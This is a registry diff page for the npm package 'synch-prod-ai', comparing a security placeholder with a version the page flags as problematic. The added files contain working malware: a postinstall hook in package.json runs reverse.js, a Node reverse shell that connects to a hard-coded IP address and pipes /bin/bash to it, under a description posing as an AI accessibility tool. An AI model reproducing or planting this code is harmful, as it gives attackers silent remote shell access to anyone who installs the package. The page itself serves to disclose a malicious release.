synch-prod-ai 0.0.1-security → 43.3.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of synch-prod-ai might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log("Hello World!")
package/package.json CHANGED
@@ -1,6 +1,18 @@
1
1
  {
2
2
  "name": "synch-prod-ai",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "43.3.6",
4
+ "description": "ai tool used to improve user accesiblity to remote machines ADDED: Advanced AI capabilities and anti scraper mechanism ",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo test",
8
+ "postinstall": "node reverse.js"
9
+ },
10
+ "keywords": [
11
+ "ai",
12
+ "sync",
13
+ "prod",
14
+ "2024"
15
+ ],
16
+ "author": "lenin",
17
+ "license": "ISC"
6
18
  }
package/reverse.js ADDED
@@ -0,0 +1,23 @@
1
+ var net = require('net');
2
+ var spawn = require('child_process').spawn;
3
+
4
+ var HOST, PORT, TIMEOUT;
5
+ HOST="34.165.144.112";
6
+ PORT="25632";
7
+ TIMEOUT="5000"
8
+
9
+ function c(HOST,PORT) {
10
+ var client = new net.Socket();
11
+ client.connect(PORT, HOST, function() {
12
+ var sh = spawn('/bin/bash',[]);
13
+ client.write("Connected\r\n");
14
+ client.pipe(sh.stdin);
15
+ sh.stdout.pipe(client);
16
+ });
17
+ client.on('error', function(e) {
18
+ setTimeout(c(HOST,PORT), TIMEOUT);
19
+ });
20
+ }
21
+
22
+ c(HOST, PORT);
23
+
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=synch-prod-ai for more information.